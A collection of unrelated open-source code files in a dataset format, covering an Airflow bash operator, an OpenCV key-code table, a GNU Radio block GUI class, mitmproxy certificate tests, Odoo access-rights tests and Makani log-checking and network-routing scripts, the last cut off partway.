self.xcom_push_flag = xcom_push
self.output_encoding = output_encoding
def execute(self, context):
"""
Execute the bash command in a temporary directory
which will be cleaned afterwards
"""
bash_command = self.bash_command
logging.info("tmp dir root location: \n" + gettempdir())
with TemporaryDirectory(prefix='airflowtmp') as tmp_dir:
with NamedTemporaryFile(dir=tmp_dir, prefix=self.task_id) as f:
f.write(bytes(bash_command, 'utf_8'))
f.flush()
fname = f.name
                script_location = fname  # f.name is already an absolute path
logging.info("Temporary script "
"location :{0}".format(script_location))
logging.info("Running command: " + bash_command)
sp = Popen(
['bash', fname],
stdout=PIPE, stderr=STDOUT,
cwd=tmp_dir, env=self.env,
preexec_fn=os.setsid)
self.sp = sp
logging.info("Output:")
line = ''
for line in iter(sp.stdout.readline, b''):
line = line.decode(self.output_encoding).strip()
logging.info(line)
sp.wait()
logging.info("Command exited with "
"return code {0}".format(sp.returncode))
if sp.returncode:
raise AirflowException("Bash command failed")
if self.xcom_push_flag:
return line
def on_kill(self):
logging.info('Sending SIGTERM signal to bash process group')
os.killpg(os.getpgid(self.sp.pid), signal.SIGTERM)
| apache-2.0 |
axelstram/deep-visualization-toolbox | keys.py | 12 | 4628 | # Define keys
#class KeyPatten(object):
# '''Define a pattern that will be matched against a keycode.
#
# A KeyPattern is used to determine which key was pressed in
# OpenCV. This process is complicated by the fact that different
# platforms define different key codes for each key. Further, on
# some platforms the value returned by OpenCV is different than that
# returned by Python ord(). See the following link for more
# information:
# https://stackoverflow.com/questions/14494101/using-other-keys-for-the-waitkey-function-of-opencv/20577067#20577067
# '''
# def __init__(self, code, mask = None):
# self.code = code
# self.mask = mask
# #self.mask = 0xffffffff # 64 bits. All codes observed so far are < 2**64
# Larger masks (requiring a more specific pattern) are matched first
key_data = []
for letter in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
#for letter in 'abefghijklmnopqrstuvwxyzABEFGHIJKLMNOPQRSTUVWXYZ01456789':
key_data.append((letter, ord(letter), 0xff)) # Match only lowest byte
key_data.extend([
# Mac (note diff order vs Linux)
('up', 0xf700, 0xffff),
('down', 0xf701, 0xffff),
('left', 0xf702, 0xffff),
('right', 0xf703, 0xffff),
# Ubuntu US/UK (note diff order vs Mac)
('left', 0xff51, 0xffff),
('up', 0xff52, 0xffff),
('right', 0xff53, 0xffff),
('down', 0xff54, 0xffff),
# Ubuntu only; modified keys to not produce separate events on
# Mac. These are included only so they be ignored without
# producing error messages.
('leftshift', 0xffe1, 0xffff),
('rightshift', 0xffe2, 0xffff),
('leftctrl', 0xffe3, 0xffff),
('rightctrl', 0xffe4, 0xffff),
('esc', 27, 0xff), # Mac
('enter', 13, 0xff), # Mac
('enter', 10, 0xff), # Ubuntu with UK keyboard
])
key_patterns = dict()
# Store key_patterns by mask in a dict of dicts
# Eventually, e.g.:
# key_patterns[0xff][97] = 'a'
for key_datum in key_data:
#print key_datum
assert len(key_datum) in (2,3), 'Key information should be tuple of length 2 or 3 but it is %s' % repr(key_datum)
if len(key_datum) == 3:
label, key_code, mask = key_datum
else:
label, key_code = key_datum
mask = 0xffffffff # 64 bits. All codes observed so far are < 2**64
if not mask in key_patterns:
key_patterns[mask] = dict()
if key_code in key_patterns[mask]:
        old_label = key_patterns[mask][key_code]
if old_label != label:
print 'Warning: key_patterns[%s][%s] old value %s being overwritten with %s' % (mask, key_code, old_label, label)
if key_code != (key_code & mask):
print 'Warning: key_code %s for key label %s will never trigger using mask %s' % (key_code, label, mask)
key_patterns[mask][key_code] = label
#if not label in key_patterns[mask]:
# key_patterns[mask][label] = set()
#key_patterns[mask][label].add(code)
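# Illustrative lookup (a sketch, not part of the original file): consumers
# match a raw keycode against the most specific masks first, as the comment
# above the key_data table describes.
#
#   def label_for_keycode(raw_code):
#       for mask in sorted(key_patterns.keys(), reverse=True):
#           label = key_patterns[mask].get(raw_code & mask)
#           if label is not None:
#               return label
#       return None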
#class Key:
# up=(63232, 'up')
# right=(63235, 'right')
# down=(63233, 'down')
# left=(63234, 'left')
# esc=(27, 'esc')
# enter=(13, 'enter')
# a =(ord('a'),'a')
# b =(ord('b'),'b')
# c =(ord('c'),'c')
# d =(ord('d'),'d')
# e =(ord('e'),'e')
# f =(ord('f'),'f')
# g =(ord('g'),'g')
# h =(ord('h'),'h')
# i =(ord('i'),'i')
# j =(ord('j'),'j')
# k =(ord('k'),'k')
# l =(ord('l'),'l')
# m =(ord('m'),'m')
# n =(ord('n'),'n')
# o =(ord('o'),'o')
# p =(ord('p'),'p')
# q =(ord('q'),'q')
# r =(ord('r'),'r')
# s =(ord('s'),'s')
# t =(ord('t'),'t')
# u =(ord('u'),'u')
# v =(ord('v'),'v')
# w =(ord('w'),'w')
# x =(ord('x'),'x')
# y =(ord('y'),'y')
# z =(ord('z'),'z')
# A =(ord('A'),'A')
# B =(ord('B'),'B')
# C =(ord('C'),'C')
# D =(ord('D'),'D')
# E =(ord('E'),'E')
# F =(ord('F'),'F')
# G =(ord('G'),'G')
# H =(ord('H'),'H')
# I =(ord('I'),'I')
# J =(ord('J'),'J')
# K =(ord('K'),'K')
# L =(ord('L'),'L')
# M =(ord('M'),'M')
# N =(ord('N'),'N')
# O =(ord('O'),'O')
# P =(ord('P'),'P')
# Q =(ord('Q'),'Q')
# R =(ord('R'),'R')
# S =(ord('S'),'S')
# T =(ord('T'),'T')
# U =(ord('U'),'U')
# V =(ord('V'),'V')
# W =(ord('W'),'W')
# X =(ord('X'),'X')
# Y =(ord('Y'),'Y')
# Z =(ord('Z'),'Z')
# n1=(ord('1'),'1')
# n2=(ord('2'),'2')
# n3=(ord('3'),'3')
# n4=(ord('4'),'4')
# n5=(ord('5'),'5')
# n6=(ord('6'),'6')
# n7=(ord('7'),'7')
# n8=(ord('8'),'8')
# n9=(ord('9'),'9')
# n0=(ord('0'),'0')
| mit |
levelrf/level_basestation | grc/gui/Block.py | 5 | 6651 | """
Copyright 2007, 2008, 2009 Free Software Foundation, Inc.
This file is part of GNU Radio
GNU Radio Companion is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
from Element import Element
import Utils
import Colors
from .. base import odict
from Constants import BORDER_PROXIMITY_SENSITIVITY
from Constants import \
BLOCK_LABEL_PADDING, \
PORT_SEPARATION, LABEL_SEPARATION, \
PORT_BORDER_SEPARATION, POSSIBLE_ROTATIONS
import pygtk
pygtk.require('2.0')
import gtk
import pango
BLOCK_MARKUP_TMPL="""\
#set $foreground = $block.is_valid() and 'black' or 'red'
<span foreground="$foreground" font_desc="Sans 8"><b>$encode($block.get_name())</b></span>"""
class Block(Element):
"""The graphical signal block."""
def __init__(self):
"""
        Block constructor.
Add graphics related params to the block.
"""
#add the position param
self.get_params().append(self.get_parent().get_parent().Param(
block=self,
n=odict({
'name': 'GUI Coordinate',
'key': '_coordinate',
'type': 'raw',
'value': '(0, 0)',
'hide': 'all',
})
))
self.get_params().append(self.get_parent().get_parent().Param(
block=self,
n=odict({
'name': 'GUI Rotation',
'key': '_rotation',
'type': 'raw',
'value': '0',
'hide': 'all',
})
))
Element.__init__(self)
def get_coordinate(self):
"""
Get the coordinate from the position param.
Returns:
the coordinate tuple (x, y) or (0, 0) if failure
"""
try: #should evaluate to tuple
coor = eval(self.get_param('_coordinate').get_value())
x, y = map(int, coor)
fgW,fgH = self.get_parent().get_size()
if x <= 0:
x = 0
elif x >= fgW - BORDER_PROXIMITY_SENSITIVITY:
x = fgW - BORDER_PROXIMITY_SENSITIVITY
if y <= 0:
y = 0
elif y >= fgH - BORDER_PROXIMITY_SENSITIVITY:
y = fgH - BORDER_PROXIMITY_SENSITIVITY
return (x, y)
except:
self.set_coordinate((0, 0))
return (0, 0)
def set_coordinate(self, coor):
"""
Set the coordinate into the position param.
Args:
coor: the coordinate tuple (x, y)
"""
self.get_param('_coordinate').set_value(str(coor))
def get_rotation(self):
"""
Get the rotation from the position param.
Returns:
the rotation in degrees or 0 if failure
"""
try: #should evaluate to dict
rotation = eval(self.get_param('_rotation').get_value())
return int(rotation)
except:
self.set_rotation(POSSIBLE_ROTATIONS[0])
return POSSIBLE_ROTATIONS[0]
def set_rotation(self, rot):
"""
Set the rotation into the position param.
Args:
rot: the rotation in degrees
"""
self.get_param('_rotation').set_value(str(rot))
def create_shapes(self):
"""Update the block, parameters, and ports when a change occurs."""
Element.create_shapes(self)
if self.is_horizontal(): self.add_area((0, 0), (self.W, self.H))
elif self.is_vertical(): self.add_area((0, 0), (self.H, self.W))
def create_labels(self):
"""Create the labels for the signal block."""
Element.create_labels(self)
self._bg_color = self.get_enabled() and Colors.BLOCK_ENABLED_COLOR or Colors.BLOCK_DISABLED_COLOR
layouts = list()
#create the main layout
layout = gtk.DrawingArea().create_pango_layout('')
layouts.append(layout)
layout.set_markup(Utils.parse_template(BLOCK_MARKUP_TMPL, block=self))
self.label_width, self.label_height = layout.get_pixel_size()
#display the params
markups = [param.get_markup() for param in self.get_params() if param.get_hide() not in ('all', 'part')]
if markups:
layout = gtk.DrawingArea().create_pango_layout('')
layout.set_spacing(LABEL_SEPARATION*pango.SCALE)
layout.set_markup('\n'.join(markups))
layouts.append(layout)
w,h = layout.get_pixel_size()
self.label_width = max(w, self.label_width)
self.label_height += h + LABEL_SEPARATION
width = self.label_width
height = self.label_height
#setup the pixmap
pixmap = self.get_parent().new_pixmap(width, height)
gc = pixmap.new_gc()
gc.set_foreground(self._bg_color)
pixmap.draw_rectangle(gc, True, 0, 0, width, height)
#draw the layouts
h_off = 0
for i,layout in enumerate(layouts):
w,h = layout.get_pixel_size()
if i == 0: w_off = (width-w)/2
else: w_off = 0
pixmap.draw_layout(gc, w_off, h_off, layout)
h_off = h + h_off + LABEL_SEPARATION
#create vertical and horizontal pixmaps
self.horizontal_label = pixmap
if self.is_vertical():
self.vertical_label = self.get_parent().new_pixmap(height, width)
Utils.rotate_pixmap(gc, self.horizontal_label, self.vertical_label)
#calculate width and height needed
self.W = self.label_width + 2*BLOCK_LABEL_PADDING
self.H = max(*(
[self.label_height+2*BLOCK_LABEL_PADDING] + [2*PORT_BORDER_SEPARATION + \
sum([port.H + PORT_SEPARATION for port in ports]) - PORT_SEPARATION
for ports in (self.get_sources(), self.get_sinks())]
))
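		# i.e. the block must be tall enough for whichever is larger: the
		# label (plus padding) or the taller of the two port stacks
		# (sources vs sinks), with PORT_SEPARATION between adjacent ports.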
def draw(self, gc, window):
"""
Draw the signal block with label and inputs/outputs.
Args:
gc: the graphics context
window: the gtk window to draw on
"""
x, y = self.get_coordinate()
#draw main block
Element.draw(
self, gc, window, bg_color=self._bg_color,
border_color=self.is_highlighted() and Colors.HIGHLIGHT_COLOR or Colors.BORDER_COLOR,
)
#draw label image
if self.is_horizontal():
window.draw_drawable(gc, self.horizontal_label, 0, 0, x+BLOCK_LABEL_PADDING, y+(self.H-self.label_height)/2, -1, -1)
elif self.is_vertical():
window.draw_drawable(gc, self.vertical_label, 0, 0, x+(self.H-self.label_height)/2, y+BLOCK_LABEL_PADDING, -1, -1)
#draw ports
for port in self.get_ports(): port.draw(gc, window)
def what_is_selected(self, coor, coor_m=None):
"""
Get the element that is selected.
Args:
coor: the (x,y) tuple
coor_m: the (x_m, y_m) tuple
Returns:
this block, a port, or None
"""
for port in self.get_ports():
port_selected = port.what_is_selected(coor, coor_m)
if port_selected: return port_selected
return Element.what_is_selected(self, coor, coor_m)
| gpl-3.0 |
laurmurclar/mitmproxy | test/mitmproxy/test_certs.py | 1 | 6730 | import os
from mitmproxy import certs
from mitmproxy.test import tutils
# class TestDNTree:
# def test_simple(self):
# d = certs.DNTree()
# d.add("foo.com", "foo")
# d.add("bar.com", "bar")
# assert d.get("foo.com") == "foo"
# assert d.get("bar.com") == "bar"
# assert not d.get("oink.com")
# assert not d.get("oink")
# assert not d.get("")
# assert not d.get("oink.oink")
#
# d.add("*.match.org", "match")
# assert not d.get("match.org")
# assert d.get("foo.match.org") == "match"
# assert d.get("foo.foo.match.org") == "match"
#
# def test_wildcard(self):
# d = certs.DNTree()
# d.add("foo.com", "foo")
# assert not d.get("*.foo.com")
# d.add("*.foo.com", "wild")
#
# d = certs.DNTree()
# d.add("*", "foo")
# assert d.get("foo.com") == "foo"
# assert d.get("*.foo.com") == "foo"
# assert d.get("com") == "foo"
class TestCertStore:
def test_create_explicit(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
assert ca.get_cert(b"foo", [])
ca2 = certs.CertStore.from_store(d, "test")
assert ca2.get_cert(b"foo", [])
assert ca.default_ca.get_serial_number() == ca2.default_ca.get_serial_number()
def test_create_no_common_name(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
assert ca.get_cert(None, [])[0].cn is None
def test_create_tmp(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
assert ca.get_cert(b"foo.com", [])
assert ca.get_cert(b"foo.com", [])
assert ca.get_cert(b"*.foo.com", [])
r = ca.get_cert(b"*.foo.com", [])
assert r[1] == ca.default_privatekey
def test_sans(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
c1 = ca.get_cert(b"foo.com", [b"*.bar.com"])
ca.get_cert(b"foo.bar.com", [])
# assert c1 == c2
c3 = ca.get_cert(b"bar.com", [])
assert not c1 == c3
def test_sans_change(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
ca.get_cert(b"foo.com", [b"*.bar.com"])
cert, key, chain_file = ca.get_cert(b"foo.bar.com", [b"*.baz.com"])
assert b"*.baz.com" in cert.altnames
def test_expire(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
ca.STORE_CAP = 3
ca.get_cert(b"one.com", [])
ca.get_cert(b"two.com", [])
ca.get_cert(b"three.com", [])
assert (b"one.com", ()) in ca.certs
assert (b"two.com", ()) in ca.certs
assert (b"three.com", ()) in ca.certs
ca.get_cert(b"one.com", [])
assert (b"one.com", ()) in ca.certs
assert (b"two.com", ()) in ca.certs
assert (b"three.com", ()) in ca.certs
ca.get_cert(b"four.com", [])
assert (b"one.com", ()) not in ca.certs
assert (b"two.com", ()) in ca.certs
assert (b"three.com", ()) in ca.certs
assert (b"four.com", ()) in ca.certs
def test_overrides(self):
with tutils.tmpdir() as d:
ca1 = certs.CertStore.from_store(os.path.join(d, "ca1"), "test")
ca2 = certs.CertStore.from_store(os.path.join(d, "ca2"), "test")
assert not ca1.default_ca.get_serial_number(
) == ca2.default_ca.get_serial_number()
dc = ca2.get_cert(b"foo.com", [b"sans.example.com"])
dcp = os.path.join(d, "dc")
            with open(dcp, "wb") as f:
                f.write(dc[0].to_pem())
ca1.add_cert_file(b"foo.com", dcp)
ret = ca1.get_cert(b"foo.com", [])
assert ret[0].serial == dc[0].serial
def test_create_dhparams(self):
with tutils.tmpdir() as d:
filename = os.path.join(d, "dhparam.pem")
certs.CertStore.load_dhparam(filename)
assert os.path.exists(filename)
class TestDummyCert:
def test_with_ca(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
r = certs.dummy_cert(
ca.default_privatekey,
ca.default_ca,
b"foo.com",
[b"one.com", b"two.com", b"*.three.com", b"127.0.0.1"]
)
assert r.cn == b"foo.com"
assert r.altnames == [b'one.com', b'two.com', b'*.three.com']
r = certs.dummy_cert(
ca.default_privatekey,
ca.default_ca,
None,
[]
)
assert r.cn is None
assert r.altnames == []
class TestSSLCert:
def test_simple(self):
with open(tutils.test_data.path("mitmproxy/net/data/text_cert"), "rb") as f:
d = f.read()
c1 = certs.SSLCert.from_pem(d)
assert c1.cn == b"google.com"
assert len(c1.altnames) == 436
with open(tutils.test_data.path("mitmproxy/net/data/text_cert_2"), "rb") as f:
d = f.read()
c2 = certs.SSLCert.from_pem(d)
assert c2.cn == b"www.inode.co.nz"
assert len(c2.altnames) == 2
assert c2.digest("sha1")
assert c2.notbefore
assert c2.notafter
assert c2.subject
assert c2.keyinfo == ("RSA", 2048)
assert c2.serial
assert c2.issuer
assert c2.to_pem()
assert c2.has_expired is not None
assert not c1 == c2
assert c1 != c2
def test_err_broken_sans(self):
with open(tutils.test_data.path("mitmproxy/net/data/text_cert_weird1"), "rb") as f:
d = f.read()
c = certs.SSLCert.from_pem(d)
# This breaks unless we ignore a decoding error.
assert c.altnames is not None
def test_der(self):
with open(tutils.test_data.path("mitmproxy/net/data/dercert"), "rb") as f:
d = f.read()
s = certs.SSLCert.from_der(d)
assert s.cn
def test_state(self):
with open(tutils.test_data.path("mitmproxy/net/data/text_cert"), "rb") as f:
d = f.read()
c = certs.SSLCert.from_pem(d)
c.get_state()
c2 = c.copy()
a = c.get_state()
b = c2.get_state()
assert a == b
assert c == c2
assert c is not c2
x = certs.SSLCert('')
x.set_state(a)
assert x == c
| mit |
aifil/odoo | addons/project/tests/test_access_rights.py | 45 | 8940 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp.addons.project.tests.test_project_base import TestProjectBase
from openerp.exceptions import AccessError
from openerp.exceptions import except_orm
from openerp.tools import mute_logger
class TestPortalProjectBase(TestProjectBase):
def setUp(self):
super(TestPortalProjectBase, self).setUp()
self.user_noone = self.env['res.users'].with_context({'no_reset_password': True, 'mail_create_nosubscribe': True}).create({
'name': 'Noemie NoOne',
'login': 'noemie',
'alias_name': 'noemie',
'email': '[email protected]',
'signature': '--\nNoemie',
'notify_email': 'always',
'groups_id': [(6, 0, [])]})
self.task_3 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
'name': 'Test3', 'user_id': self.user_portal.id, 'project_id': self.project_pigs.id})
self.task_4 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
'name': 'Test4', 'user_id': self.user_public.id, 'project_id': self.project_pigs.id})
self.task_5 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
'name': 'Test5', 'user_id': False, 'project_id': self.project_pigs.id})
        self.task_6 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
            'name': 'Test6', 'user_id': False, 'project_id': self.project_pigs.id})
class TestPortalProject(TestPortalProjectBase):
@mute_logger('openerp.addons.base.ir.ir_model')
def test_portal_project_access_rights(self):
pigs = self.project_pigs
pigs.write({'privacy_visibility': 'portal'})
# Do: Alfred reads project -> ok (employee ok public)
pigs.sudo(self.user_projectuser).read(['state'])
# Test: all project tasks visible
tasks = self.env['project.task'].sudo(self.user_projectuser).search([('project_id', '=', pigs.id)])
self.assertEqual(tasks, self.task_1 | self.task_2 | self.task_3 | self.task_4 | self.task_5 | self.task_6,
'access rights: project user should see all tasks of a portal project')
# Do: Bert reads project -> crash, no group
self.assertRaises(AccessError, pigs.sudo(self.user_noone).read, ['state'])
# Test: no project task searchable
self.assertRaises(AccessError, self.env['project.task'].sudo(self.user_noone).search, [('project_id', '=', pigs.id)])
# Data: task follower
pigs.sudo(self.user_projectmanager).message_subscribe_users(user_ids=[self.user_portal.id])
self.task_1.sudo(self.user_projectuser).message_subscribe_users(user_ids=[self.user_portal.id])
self.task_3.sudo(self.user_projectuser).message_subscribe_users(user_ids=[self.user_portal.id])
# Do: Chell reads project -> ok (portal ok public)
pigs.sudo(self.user_portal).read(['state'])
# Do: Donovan reads project -> ko (public ko portal)
        # TODO: Change the except_orm to Warning (because this calls
        # check_access_rule, which still raises except_orm).
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Test: no access right to project.task
self.assertRaises(AccessError, self.env['project.task'].sudo(self.user_public).search, [])
# Data: task follower cleaning
self.task_1.sudo(self.user_projectuser).message_unsubscribe_users(user_ids=[self.user_portal.id])
self.task_3.sudo(self.user_projectuser).message_unsubscribe_users(user_ids=[self.user_portal.id])
@mute_logger('openerp.addons.base.ir.ir_model')
def test_employee_project_access_rights(self):
pigs = self.project_pigs
pigs.write({'privacy_visibility': 'employees'})
# Do: Alfred reads project -> ok (employee ok employee)
pigs.sudo(self.user_projectuser).read(['state'])
# Test: all project tasks visible
tasks = self.env['project.task'].sudo(self.user_projectuser).search([('project_id', '=', pigs.id)])
test_task_ids = set([self.task_1.id, self.task_2.id, self.task_3.id, self.task_4.id, self.task_5.id, self.task_6.id])
self.assertEqual(set(tasks.ids), test_task_ids,
'access rights: project user cannot see all tasks of an employees project')
# Do: Bert reads project -> crash, no group
self.assertRaises(AccessError, pigs.sudo(self.user_noone).read, ['state'])
# Do: Chell reads project -> ko (portal ko employee)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_portal).read, ['state'])
# Test: no project task visible + assigned
tasks = self.env['project.task'].sudo(self.user_portal).search([('project_id', '=', pigs.id)])
self.assertFalse(tasks.ids, 'access rights: portal user should not see tasks of an employees project, even if assigned')
# Do: Donovan reads project -> ko (public ko employee)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Do: project user is employee and can create a task
tmp_task = self.env['project.task'].sudo(self.user_projectuser).with_context({'mail_create_nolog': True}).create({
'name': 'Pigs task',
'project_id': pigs.id})
tmp_task.sudo(self.user_projectuser).unlink()
@mute_logger('openerp.addons.base.ir.ir_model')
def test_followers_project_access_rights(self):
pigs = self.project_pigs
pigs.write({'privacy_visibility': 'followers'})
# Do: Alfred reads project -> ko (employee ko followers)
# TODO Change the except_orm to Warning
self.assertRaises(AccessError, pigs.sudo(self.user_projectuser).read, ['state'])
# Test: no project task visible
tasks = self.env['project.task'].sudo(self.user_projectuser).search([('project_id', '=', pigs.id)])
self.assertEqual(tasks, self.task_1,
'access rights: employee user should not see tasks of a not-followed followers project, only assigned')
# Do: Bert reads project -> crash, no group
self.assertRaises(AccessError, pigs.sudo(self.user_noone).read, ['state'])
# Do: Chell reads project -> ko (portal ko employee)
self.assertRaises(except_orm, pigs.sudo(self.user_portal).read, ['state'])
# Test: no project task visible
tasks = self.env['project.task'].sudo(self.user_portal).search([('project_id', '=', pigs.id)])
self.assertEqual(tasks, self.task_3,
'access rights: portal user should not see tasks of a not-followed followers project, only assigned')
# Do: Donovan reads project -> ko (public ko employee)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Data: subscribe Alfred, Chell and Donovan as follower
pigs.message_subscribe_users(user_ids=[self.user_projectuser.id, self.user_portal.id, self.user_public.id])
self.task_1.sudo(self.user_projectmanager).message_subscribe_users(user_ids=[self.user_portal.id, self.user_projectuser.id])
self.task_3.sudo(self.user_projectmanager).message_subscribe_users(user_ids=[self.user_portal.id, self.user_projectuser.id])
# Do: Alfred reads project -> ok (follower ok followers)
prout = pigs.sudo(self.user_projectuser)
prout.invalidate_cache()
prout.read(['state'])
# Do: Chell reads project -> ok (follower ok follower)
pigs.sudo(self.user_portal).read(['state'])
# Do: Donovan reads project -> ko (public ko follower even if follower)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Do: project user is follower of the project and can create a task
self.env['project.task'].sudo(self.user_projectuser.id).with_context({'mail_create_nolog': True}).create({
'name': 'Pigs task', 'project_id': pigs.id
})
# not follower user should not be able to create a task
pigs.sudo(self.user_projectuser).message_unsubscribe_users(user_ids=[self.user_projectuser.id])
self.assertRaises(except_orm, self.env['project.task'].sudo(self.user_projectuser).with_context({
'mail_create_nolog': True}).create, {'name': 'Pigs task', 'project_id': pigs.id})
        # Do: project user can create a task without project
        self.env['project.task'].sudo(self.user_projectuser).with_context({
            'mail_create_nolog': True}).create({'name': 'Pigs task'})
| gpl-3.0 |
google/makani | analysis/checks/autocheck.py | 1 | 5507 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions to perform log autochecking."""
from makani.analysis.checks import base_check
from makani.analysis.checks import gradebook
from makani.analysis.checks import gradebook_base_check
from makani.analysis.checks import iter_files
from makani.lib.python import lru_cache
from makani.lib.python import struct_tree
def AutoCheck(log_file, check_list):
"""Run checks for a log file.
Args:
log_file: The log file to check.
check_list: A CheckList object with criteria to check.
  Side effects:
    Results accumulate on `check_list` and can be retrieved afterwards
    via check_list.MergeResults(). Example:
results[<message_type>][<aio_node>][<top_attribute>][<sub_field>] = {
'total': 1000,
'warnings': {
'count': 123,
'range': [48.8, 55.6],
},
'errors': {
'count': 123,
'range': [78.8, 91.6],
},
}
"""
data = struct_tree.StructTree(log_file, True)
cache = lru_cache.LruCache(50)
for check_item in check_list.List():
# Check every element.
args = check_item.Populate(data, cache)
check_item.Check(*args)
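# Usage sketch (paths and objects illustrative; mirrors RunFromLocal below):
#   checks = _GetFullListOfChecks(my_check_list, '/path/to/gradebook.json')
#   AutoCheck('/logs/flight_001.h5', checks)
#   results = checks.MergeResults()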
def _GetFullListOfChecks(check_list, gradebook_file):
"""Merge the regular checklist with the one defined as a gradebook."""
full_check_list = base_check.ListOfChecks()
if gradebook_file:
book = gradebook.Gradebook(gradebook_file)
gradebook_list = gradebook_base_check.GradebookChecks()
gradebook_list.Initialize(book, for_log=True, use_full_name=True)
full_check_list.Concatenate(gradebook_list)
if check_list:
full_check_list.Concatenate(check_list)
return full_check_list
def RunFromLocal(log_dir, prefix, check_list, gradebook_file, verbose):
"""Autocheck logs in a local directory."""
full_check_list = _GetFullListOfChecks(check_list, gradebook_file)
results_by_file = {}
for filename in iter_files.IterFromLocal(log_dir, prefix):
if verbose:
print 'Processing %s .......................' % filename
AutoCheck(filename, full_check_list)
if verbose:
print full_check_list.TextSummary()
results_by_file[filename] = full_check_list.MergeResults()
return results_by_file
def RunFromCloud(cloud_path, prefix, check_list, gradebook_file, verbose):
"""Autocheck logs in a cloud directory."""
results_by_file = {}
full_check_list = _GetFullListOfChecks(check_list, gradebook_file)
for filename, temp_name in iter_files.IterFilesFromCloud(cloud_path, prefix):
if verbose:
print 'Processing %s ..............................' % filename
AutoCheck(temp_name, full_check_list)
if verbose:
print full_check_list.TextSummary()
results_by_file[filename] = full_check_list.MergeResults()
return results_by_file
def MergeResultsFromMultipleFiles(results_by_file, info_levels):
"""Merge multiple results to show occurrences in files and range of values.
Args:
results_by_file: A dict of check results indexed by file name.
info_levels: A list of report levels to merge. E.g., ['warning', 'error']
Returns:
A dict of check results in the form of:
    {`check_name`: {`file_name`: {'range': [lower_bound, upper_bound],
                                  'traceback': [...]}}}
"""
merged = {}
for filename, results in results_by_file.iteritems():
if results:
for check_name, values in results.iteritems():
bounds = [float('inf'), -float('inf')]
tracebacks = set()
# Example `values`:
      # {'warning': {'count': 100, 'range': [0, 1]}}
is_set = False
for field, details in values.iteritems():
if field in info_levels:
if 'range' in details:
bounds[0] = min(bounds[0], details['range'][0])
bounds[1] = max(bounds[1], details['range'][1])
is_set = True
if 'traceback' in details:
tracebacks.add(details['traceback'])
report = {}
if is_set:
report['range'] = bounds
if tracebacks:
report['traceback'] = list(tracebacks)
if report:
if check_name not in merged:
merged[check_name] = {}
merged[check_name][filename] = report
return merged
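# Illustrative merged output (check and file names invented):
#   {'MotorTemperature': {'log_a.h5': {'range': [70.2, 80.5]},
#                         'log_b.h5': {'range': [75.0, 91.6]}}}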
def GatherResultsFromMultipleFiles(results_by_file):
"""Gather multiple results to organize them by check name and file name.
Args:
results_by_file: A dict of check results indexed by file name.
Returns:
A dict of check results in the form of:
{`check_name`: {`file_name`: {
'warning': {
'range': [lower_bound, upper_bound]
'count': number of occurrences that fall into the range,
'total': total number of data points,
},
'error': ...
}}}
"""
merged = {}
for filename, results in results_by_file.iteritems():
if results:
for check_name, values in results.iteritems():
if check_name not in merged:
merged[check_name] = {filename: values}
else:
merged[check_name][filename] = values
return merged
| apache-2.0 |
google/makani | avionics/network/network_routes.py | 1 | 3560 | #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of various AIO network tools."""
# TODO: Rename this file to something more accurate.
import re
import sys
import gflags
from makani.avionics.network import network_config
from makani.avionics.network import network_util
gflags.DEFINE_bool('print_routes', False,
'Indicates whether to print multicast routes.')
gflags.DEFINE_string('network_file', None,
'Full path to the yaml file that describes the network.')
gflags.MarkFlagAsRequired('network_file')
gflags.DEFINE_bool('write_dot_files', False,
'Indicates whether to write a dot network description file.')
FLAGS = gflags.FLAGS
def _PrintMulticastRoutes(forwarding_maps):
"""Prints the multicast routing tables for each switch."""
print ''
print 'Multicast Routes'
print '================'
for switch, forwarding_map in sorted(forwarding_maps.iteritems()):
print ' %s multicast routes:' % switch
for message_type, out_ports in sorted(forwarding_map.iteritems()):
print ' [%s] = 0x%X' % (message_type, out_ports)
def _WriteDotFiles(path_finder):
"""Writes a pair of dot files showing the network topology.
full.dot is the full network, with each port listed as a separate node.
reduced.dot is a simplified view with a node for each switch or aio_node.
